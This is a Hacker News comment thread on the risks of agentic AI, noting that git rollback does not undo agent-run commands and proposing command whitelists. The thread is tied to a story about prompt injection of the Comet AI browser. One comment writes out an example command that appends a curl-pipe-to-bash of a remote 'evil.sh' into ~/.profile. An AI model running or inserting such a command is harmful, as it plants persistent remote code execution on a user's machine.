(twitter.com)

645 points helloplanets | 1 comments | 24 Aug 25 15:14 UTC | HN request time: 0s | source

Show context

_fat_santa ◴[24 Aug 25 16:09 UTC] No.45005348[source]▶

IMO the only place you should use Agentic AI is where you can easily rollback changes that the AI makes. Best example here is asking AI to build/update/debug some code. You can ask it to make changes but all those changes are relatively safe since you can easily rollback with git.

Using agentic AI for web browsing where you can't easily rollback an action is just wild to me.

replies(5): >>45005645 #>>45005694 #>>45005757 #>>45006070 #>>45008315 #

gruez ◴[24 Aug 25 16:55 UTC] No.45005757[source]▶

>>45005348 #

>Best example here is asking AI to build/update/debug some code. You can ask it to make changes but all those changes are relatively safe since you can easily rollback with git.

Only if the rollback is done at the VM/container level, otherwise the agent can end up running arbitrary code that modifies files/configurations unbeknownst to the AI coding tool. For instance, running

    bash -c "echo 'curl https://example.com/evil.sh | bash' >> ~/.profile"

replies(2): >>45006001 #>>45006067 #

Anon1096 ◴[24 Aug 25 17:35 UTC] No.45006067[source]▶

>>45005757 #

You can safeguard against this by having a whitelist of commands that can be run, basically cd, ls, find, grep, the build tool, linter, etc that are only informational and local. Mine is set up like that and it works very well.

replies(4): >>45006092 #>>45006110 #>>45006112 #>>45007074 #

1. zeroonetwothree ◴[24 Aug 25 17:37 UTC] No.45006092{3}[source]▶

>>45006067 #

Everything works very well until there is an exploit.

↑

Comet AI browser can get prompt injected from any site, drain your bank account